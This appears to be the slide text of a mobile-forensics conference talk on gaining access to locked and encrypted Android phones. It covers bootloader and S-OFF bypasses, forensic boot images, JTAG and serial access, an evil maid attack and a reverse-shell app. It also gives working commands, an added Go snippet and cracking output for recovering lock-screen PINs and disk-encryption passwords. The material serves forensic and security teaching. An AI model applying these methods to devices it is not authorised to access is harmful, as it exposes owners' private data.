Introduction



• Why this talk is useful

  • Defend access / gain access

  • Device seizure, loss, border crossing, stop and search, espionage...

• The company

  • viaForensics - mobile security and digital forensics, strong R&D team, government agencies and corporations

• The speaker

  • Thomas Cannon - Director of Breaking Things



• ADB off by default

• Screen lock

• Code signing for updates and boot images

• Encryption

• Variety of device hardware, software and configuration

CHALLENGE ACCEPTED



Bootloader Essentials 



• How we use the bootloader 

• Accessing bootloader mode 

• Bootloader protocols 

• Bootloader protection 




Defeat The Bootloader (HTC Example)

• S-ON vs S-OFF: the secuflag is controlled in the radio firmware

• Gold Card - a specially formatted MicroSD card that can bypass the carrier ID check when flashing ROMs

• White Card - a special SIM card used as an authentication token to control access to diagnostic mode

• Emulate the White Card with hardware and combine it with a Gold Card to enter diagnostics and clear S-ON

• White Card not needed for CDMA phones

• Once S-OFF, a custom boot image can be RAM loaded

• This technique wipes most devices! But not all.

• Successfully used this technique to gain access to some locked stock HTC devices such as the HTC Desire

• Try it yourself with an XTC Clip

Forensic Boot

• Start early in the boot chain before the system loads

• Provide an ADB root shell over USB which can be used to image the device

• Do not mount anything, including cache, to prevent any writes to partitions

• Devices with raw NAND flash and wear levelling implemented in software (YAFFS2) can be prevented from overwriting deleted data




Build Boot

$ abootimg -x stock-recovery.img          (extract bootimg.cfg, zImage and initrd.img from the stock recovery image)

$ abootimg-unpack-initrd                  (unpack initrd.img into ./ramdisk)

$ cd ramdisk

(edit ramdisk contents)

$ cd ..

$ abootimg-pack-initrd -f                 (repack ./ramdisk into initrd.img, overwriting the old one)

$ abootimg -u stock-recovery.img -r initrd.img   (update the image with the new ramdisk)



RAM Disk Contents

/dev
/proc
/sbin
    adbd
    busybox (+ symlinks)
    nanddump (to dump partitions)
/sys
init
default.prop (enable root shell, ro.secure=0)
init.rc (do not mount partitions, just start adbd)
ueventd.rc



Flash and RAM Load

• Samsung

  • Dump partitions with ODIN <= 1.52 or Heimdall. Maybe.

  • Flashing with ODIN or Heimdall

    • heimdall flash --recovery recovery.bin (Epic 4G)

    • heimdall flash --kernel zImage (Galaxy S)

• HTC

  • fastboot boot recovery.img (RAM loading)

  • fastboot flash recovery recovery.img (flash partition)

• Motorola

  • sbf_flash image_name.sbf (make sure it only contains recovery)



Flasher Box - How it works

• ORT

• Riff Box

• Medusa Box

(Diagram: flasher box wired to the device's JTAG test access port, pins labelled TRST, TCK, TDO, TDI, TMS)


Serial

• Some devices have debug access via serial cables which can be used to gain access to data

• On the Samsung Galaxy S II / Galaxy Note this is activated by grounding the ID pin of the USB connector through a 523K ohm resistor

• TTL serial access is provided on the D+ and D- pins of the USB connector

• Use a Bus Pirate and a MicroUSB breakout board to connect



Crack PIN or Password

• Salt

  • /data/data/com.android.providers.settings/databases/settings.db

  • SELECT * FROM secure WHERE name = 'lockscreen.password_salt'

• PIN / password

  • /data/system/password.key

  • Salted SHA1 of the password concatenated with the salted MD5

• Calculate the value of the salt in lowercase hex with no padding
  $ python -c "print '%x' % 720624377925219614"
  a002c0dbeb8351e

• Copy the last 32 bytes of password.key (the MD5 hash in hex), add a colon and then add the salt

  5D8EC41CB1812AC0BD9CB6C4F2CD0122:a002c0dbeb8351e

• Crack with software such as oclHashcat-lite
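As an added example (not code from the talk), Go that reproduces the password.key format described above and the md5($pass.$salt) line handed to hashcat; the salt value is the one from the slide, the PIN is a constructed sample, and PasswordKey mirrors how Android builds the file (assumed from the slide's values: uppercase hex digests, lowercase unpadded hex salt).

```go
package main

import (
	"crypto/md5"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"strings"
)

// SaltHex renders lockscreen.password_salt as Android does: lowercase hex, no
// zero padding (the slide's python -c "print '%x' % 720624377925219614" step).
func SaltHex(salt int64) string {
	return fmt.Sprintf("%x", salt)
}

// PasswordKey rebuilds /data/system/password.key for a PIN or password: uppercase
// hex SHA1(pw+salt) followed by uppercase hex MD5(pw+salt). Constructed test data only.
func PasswordKey(pw, saltHex string) string {
	salted := []byte(pw + saltHex)
	s, m := sha1.Sum(salted), md5.Sum(salted)
	return strings.ToUpper(hex.EncodeToString(s[:]) + hex.EncodeToString(m[:]))
}

// HashcatLine builds the md5($pass.$salt) input the slide uses: the last 32 hex
// characters of password.key (the MD5), a colon, then the salt in hex.
func HashcatLine(passwordKey, saltHex string) (string, error) {
	if len(passwordKey) != 72 { // 40 hex chars of SHA1 + 32 of MD5
		return "", fmt.Errorf("password.key should hold 72 hex chars, got %d", len(passwordKey))
	}
	return passwordKey[40:] + ":" + saltHex, nil
}

// CheckGuess is the per-candidate comparison a cracker performs: one MD5 over
// guess+salt, which is why a GPU tests hundreds of millions of PINs per second.
func CheckGuess(line, guess string) bool {
	hash, salt, ok := strings.Cut(line, ":")
	if !ok {
		return false
	}
	m := md5.Sum([]byte(guess + salt))
	return strings.EqualFold(hex.EncodeToString(m[:]), hash)
}

func main() {
	saltHex := SaltHex(720624377925219614) // salt value from the slide
	line, _ := HashcatLine(PasswordKey("1234", saltHex), saltHex)
	fmt.Println(line, CheckGuess(line, "1234"), CheckGuess(line, "0000"))
}
```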



(Screenshots: hashcat-gui driving cudaHashcat-lite with hash type md5($pass.$salt), custom charset 1 = ?d and password length 4 to 9, i.e. the command line
cudaHashcat-lite64.exe --hash-type 1 --custom-charset1 ?d --pw-max 9 5D8EC41CB1812AC0BD9CB6C4F2CD0122:a002c0dbeb8351e
First run, cudaHashcat-lite v0.8 on a GeForce GTX 560M: Status Cracked, mask ?1?1?1?1?1?1?1?1?1, plain length 9, running time 2 seconds at 536.3M/s, Jan 11 2012.
Second run against 46ec7f12b91cdd818e4bcfa933947cf2:a002c0dbeb8351e with mask ?1?1?1?1?1?1, plain length 6, keyspace 56800235584 (a 62-character alphanumeric charset): Status Cracked, running time 47 seconds at 561.5M/s.)



HID Brute Force?

(Video)

• AVR ATMEGA32U4 emulates a USB keyboard typing PINs

• USB OTG cable for USB host

• Devices usually rate limit attempts and wipe after too many incorrect passcodes




Android Encryption

(Screenshots: Settings > About phone on a Nexus S: Android version 4.0.4, baseband version I9020XXKI1, kernel version 3.0.8-g6656123 #1 Thu Feb 2 16:56:02 PST 2012, build number IMM76D. The "Encrypt phone" screen reads: "You can encrypt your accounts, settings, downloaded apps and their data, media, and other files. Once you encrypt your phone, you must enter a numeric PIN or password to decrypt it each time you power it on: you can't unencrypt your phone except by performing a factory data reset, erasing all your data. Encryption takes an hour or more. You must start with a charged battery and keep your phone plugged in until" (rest cut off), followed by the progress screen "Wait while your phone is being encrypted. 5% complete.")

• Supported since Android 3.0

• Based on dm-crypt

• AES 128 CBC

• Implementations may vary, e.g. Samsung has their own key management module

Android Encryption

(Key derivation diagram, keylen=32)

Password/PIN --> PBKDF2 x2000 --> Key+IV (32 bytes) = Key (128 bit) || IV (128 bit)

/dev/urandom --> Salt (128 bit) and Master Key (128 bit)

Master Key (128 bit) --AES 128 CBC under Key, IV--> Encrypted Master Key (128 bit)

(Data encryption diagram)

Master Key (128 bit) --AES 128 CBC, IV = ESSIV:SHA256--> Encrypted userdata partition <--> userdata partition



Cracking Encryption

/* Footer layout from Android's vold cryptfs.h; the slide lists only these fields */
struct crypt_mnt_ftr {
    __le32 magic;
    __le16 major_version;
    __le16 minor_version;
    __le32 ftr_size;              /* in bytes, not including the key that follows */
    __le32 flags;
    __le32 keysize;               /* in bytes */
    __le32 spare1;
    __le64 fs_size;               /* size of the encrypted fs, in 512 byte sectors */
    __le32 failed_decrypt_count;  /* set to 0 on a successful mount */
    /* ... */
};

• Encrypted Master Key + Salt stored in footer

• Footer stored at the end of the partition, or in a footer file on another partition, or as a partition itself

• Image device and locate footer + encrypted userdata partition



Cracking Encryption

• Parse footer

• Locate Salt and Encrypted Master Key

• Run a password guess through PBKDF2 with the salt, use the resulting key and IV to decrypt the master key, then use the resulting master key to decrypt the first sector of the encrypted image.

• If the password is correct, plain text will be revealed






Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 9
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts:
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x82AF933B1AF0968D835239CE69526C60
Salt           : 0x31D720E6F7F78A23D793E125378E5F49
Trying Password: 1234
Derived Key    : 0x38E6A59647776E94AD09C1DACA7B4971
Derived IV     : 0xB3F8D260076D92A1CFAE7D807DC1613C
Decrypted Key  : 0x0552393822D311BE023617F258C3E1BB
ESSIV IV       : 0xB31C2837995393102ECC539D460D77C1
Decrypted Data : 0xEE961EE40CC036D88D2D29206D888FC500000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000

Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  :
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts:
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x82AF933B1AF0968D835239CE69526C60
Salt           : 0x31D720E6F7F78A23D793E125378E5F49
Trying Password: 5555
Derived Key    : 0x3AC2D38F705281EBB45430D5770B2BFD
Derived IV     : 0xAF4CB6F2C3481C20B8430DE869608A4A
Decrypted Key  : 0x85BE68592503F89CB0F9BBD82972AE07
ESSIV IV       : 0x52989B5B082368326FB4014D06A0A67C
Decrypted Data : 0xB0D17B11AB13D1C432A4816ABF39319976187A54D58961B7808191E6AA4F4
06E8A4DCC2D4986F377981D79AD7C625390545B3033472EB069AEC33451BF8DDB8E6B4A502C41A61
1309BDFC3E65A88027B7ECCB1B7D04573EAD6194C87C0A8D661E62D942354EF218378E76EB30BFB2
5E97391AC9A268BCD49F274680313ED1D1FFD4663B249A282CCC49D5C54EB528427FCC43B3CDF2FC
86892271F89736CE53BBD117BFBB8025DA75C74EF46025F6AC1547DA8D3F1FCC6542DA0EBA9F5D87
0D3743E5440D61D4DDAE26048018002C597335FDDB84AF89922E0C165128A3C51082877CE9F51840
12FFE73CA346922B1F931E3C6EE30AC781479D2DB6FB168965A92809B54523DC228AC473AE8164A8
F20A2BB74617CFB536AF3B61BBF0C273BE30F006E646817E42FD4579B8F3B34934C12F5D280CE764
F1381120D746683F2AC5AF825CC25AE089B355044E86CC207484A0F365E465C7B2E980456D4C0BA8
462A19EF4227E1E3AF92A9386BF585894327740647B537DB96302B51899DED97B37FC49D1B35F618
FC4F775E3FB159DD4800FB8577C38404AAD366E18E1A62C2E944CDE45732A9B5E20F80D6DE03FCAF
855CE41D1D8CE3D033FE8B05F861F781DCA100A18DF910EA519A6E52C15DADCCC8C10A42AC3D7BD0
DE37C3B28932131D37198BD7AB1D48CB895C8B1159715F49424887D245034C6510F43FED085CBE23
8CA



• Cracking PINs takes seconds. Passwords are usually short or follow patterns due to being the same as the lock screen password



Evil Maid Attack

• Load an app onto the system partition, wait for the owner to boot the phone, get remote access to the decrypted user data

• Rootkits - easy to compile for Android

• Evil USB charger



Reverse Shell

(Screenshots: "vF Android WebShell Started" running as uid=10039 (app_39) gid=10039 (app_39) on a Linux 2.6.29 Android 2.3 emulator (5554), listing the sdcard contents, among them AndRevShell.apk; and on the desktop "python andrevshell.py" reporting "RevShell Server running on port 8080")

• App with no permissions can create a reverse shell, giving remote access to attacker



Desperate Techniques

• Hard reset - some devices prior to 3.0 did not wipe data properly. Wipe, boot, root and recover

• Chip-off - de-solder NAND chips

• Screen smudges



More Techniques!

• Custom update.zip - can you get one signed?

• Race condition on updates via SD cards - fixed

• Own a CA? Who doesn't these days? MITM the connection, push an app, update or exploit

• Entry via Google Play, if credentials are cached on the desktop



Santoku Linux

Free and open bootable Linux distribution full of tools

Project is a collaboration with other mobile security pros

• Mobile Forensics

• Mobile App Security Testing

• Mobile Malware Analysis

Check out the Alpha release at https://santoku-linux.com



VIAFORENSICS

Thomas Cannon

thomas.cannon
github.com/thomascannon
tcannon@viaforensics.com

For the latest versions of our presentations visit:
https://viaforensics.com/resources/presentations



